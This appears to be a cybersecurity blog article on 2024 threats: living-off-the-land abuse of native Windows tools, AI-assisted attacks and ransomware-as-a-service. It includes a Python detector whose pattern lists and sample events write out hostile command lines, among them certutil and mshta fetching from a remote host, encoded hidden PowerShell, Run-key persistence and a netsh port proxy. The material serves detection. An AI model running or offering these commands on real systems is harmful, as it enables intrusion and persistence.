In today’s fast-evolving cybersecurity environment, being aware of upcoming threats on the horizon is crucial for informing the preparations and actions that are needed to boost enterprise resilience. This is no easy task, however, as the threat landscape expands and attacks become ever more sophisticated.
In 2024, relying on traditional strategies to address new challenges will no longer be enough. To prevent intrusion and speed recovery, IT operations and security operations teams will need to share intelligence and work hand in glove. They’ll also need to know where to focus security efforts over the coming year.
With that in mind, let’s take a look at the top cyberthreats to watch out for in 2024.
Living off the Land: the rise of the invisible threat
Rather than deploying custom malware, today’s attackers are using tools and resources that are legitimately installed on the operating system to covertly carry out their activities.
Difficult to detect, these so-called living-off-the-land (LOTL, often shortened to LOL) techniques enable attackers to lurk in plain sight and circumvent traditional security measures. For example, attackers abuse signed system binaries (LOLBins), scripts (LOLScripts) and libraries to shield their actions and deploy malicious payloads.
By leveraging native OS utilities, attackers are able to hide their activities within normal system operations and bypass endpoint detection and response (EDR) controls designed to detect and block malware. For instance, native Windows tools such as cmd.exe, the default command-line interpreter for Windows, are being used by attackers to execute scripts and commands and to conceal persistent backdoor activity.
Because these tactics blend in so seamlessly, organised cyberattack groups are increasingly adopting them. It recently emerged that the state-sponsored Volt Typhoon group used LOTL techniques to blend in with regular Windows system and network activity so that it could undertake surveillance on utility companies that support US military installations.
To counter this threat, organisations will need to double down on reviewing system and network configurations; step up logging, monitoring and behavioural analysis, paying particular attention to which processes launch native utilities and with what arguments; and introduce realistic decoys that will tempt bad actors into engaging and exposing their techniques.
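The behavioural analysis described above boils down to looking at process-creation telemetry for native binaries being used in ways they rarely are during normal operations. The following detector is an added example written for this article, not code from the original page or from any vendor product. It assumes that Windows process-creation events (for instance Sysmon Event ID 1 or Security Event ID 4688) have already been collected and normalised into dictionaries with Image, CommandLine, ParentImage and User fields; the event records at the bottom are constructed for the example, and the rule list is a small, generic starting set rather than a complete LOLBin catalogue.

```python
"""Flag living-off-the-land (LOTL) activity in Windows process-creation events.

Added example, not code from the original article. Input events are assumed
to be dictionaries with Image, CommandLine, ParentImage and User keys; the
SAMPLE_EVENTS below are constructed for illustration.
"""
import ntpath
import re
from dataclasses import dataclass

# Native binaries that attackers commonly abuse (LOLBins). The binary itself
# is legitimate, so the rule fires only on argument patterns that are rarely
# seen in benign use; that keeps the false-positive rate tolerable.
SUSPICIOUS_ARGS = {
    "certutil.exe": [r"-urlcache", r"-decode", r"-encode"],
    "rundll32.exe": [r"javascript:", r"\.dll\s*,\s*\w+\s+https?://"],
    "mshta.exe": [r"https?://", r"vbscript:", r"javascript:"],
    "regsvr32.exe": [r"/i:https?://", r"scrobj\.dll"],
    "bitsadmin.exe": [r"/transfer", r"/addfile"],
    "wmic.exe": [r"process\s+call\s+create", r"/node:"],
    "netsh.exe": [r"portproxy\s+add"],
    "ntdsutil.exe": [r"\bifm\b"],
    "powershell.exe": [r"-e(nc|ncodedcommand)?\s+", r"downloadstring",
                       r"\biex\b", r"-nop\b", r"frombase64string"],
    "cmd.exe": [r"/c\s+.*(powershell|certutil|bitsadmin)"],
}

# Office applications spawning an interpreter is a classic phishing foothold.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Command lines that establish persistence with built-in tools, whatever
# image ran them (the interpreter may be cmd.exe, reg.exe, schtasks.exe ...).
PERSISTENCE_ARGS = [
    r"schtasks(\.exe)?\s+/create",
    r"reg(\.exe)?\s+add\s+.*\\currentversion\\run",
    r"\bsc(\.exe)?\s+create",
    r"\\startup\\",
]


@dataclass
class Finding:
    index: int          # position of the event in the input list
    rule: str           # which detection rule fired
    image: str          # normalised image name
    command_line: str


def basename(path):
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def analyse(event):
    """Return the list of rule names that match a single event."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    rules = []
    if any(re.search(p, cmd, re.IGNORECASE) for p in SUSPICIOUS_ARGS.get(image, [])):
        rules.append(f"lolbin_args:{image}")
    if parent in OFFICE_PARENTS and image in SCRIPT_CHILDREN:
        rules.append(f"office_spawn:{parent}->{image}")
    if any(re.search(p, cmd, re.IGNORECASE) for p in PERSISTENCE_ARGS):
        rules.append("persistence")
    return rules


def scan(events):
    """Run every rule over every event and collect the findings."""
    return [Finding(i, rule, basename(ev.get("Image", "")), ev.get("CommandLine", ""))
            for i, ev in enumerate(events) for rule in analyse(ev)]


SYS32 = r"C:\Windows\System32"
# Constructed sample telemetry: a mix of routine admin activity and LOTL abuse.
SAMPLE_EVENTS = [
    {"Image": SYS32 + r"\cmd.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"cmd.exe /c dir C:\Users", "User": "CORP\\alice"},
    {"Image": SYS32 + r"\certutil.exe", "ParentImage": SYS32 + r"\cmd.exe",
     "CommandLine": r"certutil.exe -verify cert.cer", "User": "CORP\\alice"},
    {"Image": SYS32 + r"\certutil.exe", "ParentImage": SYS32 + r"\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\Users\Public\a.txt",
     "User": "CORP\\alice"},
    {"Image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
     "User": "CORP\\bob"},
    {"Image": SYS32 + r"\reg.exe", "ParentImage": SYS32 + r"\cmd.exe",
     "CommandLine": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\svc.exe",
     "User": "CORP\\bob"},
    {"Image": SYS32 + r"\schtasks.exe", "ParentImage": SYS32 + r"\cmd.exe",
     "CommandLine": r"schtasks /query /tn Backup", "User": "CORP\\alice"},
    {"Image": SYS32 + r"\mshta.exe", "ParentImage": SYS32 + r"\cmd.exe",
     "CommandLine": r"mshta.exe http://203.0.113.5/p.hta", "User": "CORP\\bob"},
    {"Image": SYS32 + r"\netsh.exe", "ParentImage": SYS32 + r"\cmd.exe",
     "CommandLine": r"netsh interface portproxy add v4tov4 listenport=9999 connectaddress=203.0.113.5 connectport=443",
     "User": "NT AUTHORITY\\SYSTEM"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.index}: {f.rule}: {f.command_line}")
```

The rules are deliberately keyed on argument patterns and parent-child relationships rather than on the binary name alone: certutil.exe verifying a certificate and schtasks.exe querying a task are routine, while certutil.exe fetching a URL or Word spawning an encoded PowerShell command are not. In production the same logic would sit in a SIEM or EDR query against the real event stream, with the pattern list tuned to the environment's own baseline.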
The cyber AI risk gets real
The UK’s National Cyber Security Centre (NCSC) recently issued a stark warning about how AI is set to increase the volume and impact of cyberattacks. Highlighting how generative AI tools both lower the barrier to entry for less sophisticated attackers and boost the capabilities of established ones, the NCSC has urged organisations to act now. Indeed, according to one recent report, cybersecurity professionals at large enterprises say they are already witnessing a substantive increase in generative AI-enabled threats.
In addition to using generative AI tools such as chatbots to craft highly personalised phishing campaigns or to produce keyloggers and basic code aimed at cracking a specific target’s credentials, concerns are rising that bad actors could use AI-driven analysis and predictive modelling to discover vulnerable assets or identify new weaknesses that can be exploited with minimal effort.
To address this challenge, organisations should initiate their own AI-powered defence procedures to automate the detection and remediation of non-compliant systems, undertake automated patching, and manage previously labour-intensive activities such as identity and access management.
Similarly, generative AI can be used to parse myriad logs across multiple systems and devices far more quickly, identifying attacks earlier and kicking off the preventive actions needed to limit damage and protect key resources and data.
By leveraging AI to achieve a more compliant and robust zero trust infrastructure and address threat alerts in real-time, organisations will be able to initiate a truly proactive defence posture.
Ransomware-as-a-service (RaaS) is set to skyrocket
Today’s hackers have established highly complex RaaS subscription and distribution models that make it easy for threat actors with limited expertise or know-how to initiate highly advanced attacks using up-to-the-minute techniques and approaches.
With RaaS providers now specialising in specific aspects of the attack process, today’s would-be attackers can take advantage of kits that provide everything they’ll need to get up and running. These ready-made offerings include payment portals and specialist support services as well as a range of ransomware variants such as LockBit, REvil and Dharma, all of which can be brought together to create a bespoke ransomware attack.
With RaaS spawning more frequent and complex attacks, organisations will need to enhance their ransomware readiness. This may include strengthening their vulnerability management capabilities, utilising early-warning detection tools, enforcing multi-factor authentication, and automating the backup and recovery of production data so they can recover fast in the event of a breach.
Top tips for boosting cyber resilience in 2024
As cyber criminals evolve their approaches, ensuring business continuity and cyber resilience in the coming year depends on organisations taking some key actions to ensure they are better prepared when it comes to maintaining vigilance over their systems and recovering faster from an attack:
• As a priority, organisations should eliminate the operational silos that exist between ITOps and security teams and enable a more collaborative approach to resilience. This shared responsibility should, at a minimum, encompass segmentation, redundancy, deception, contextual awareness, and privilege restriction.
• Returning to business-as-usual operations following a cyberattack should be viewed as a top security objective, and establishing robust data recovery techniques will be of primary importance.
• IT teams must frequently test recovery processes to ensure that all data can always be recovered, in a predictable way. Waiting for a real-life attack to see if recovery plans perform as expected is an inherently risky approach.
• Deploying early detection techniques will enable IT and security teams to proactively hunt for attacks in progress and stop them, by identifying the anomalous behaviours that are an early indicator of compromise.
Cyber attacks are simply unavoidable, so organisations must adopt techniques that will keep their data safe even against the new generation of sophisticated cybercriminals.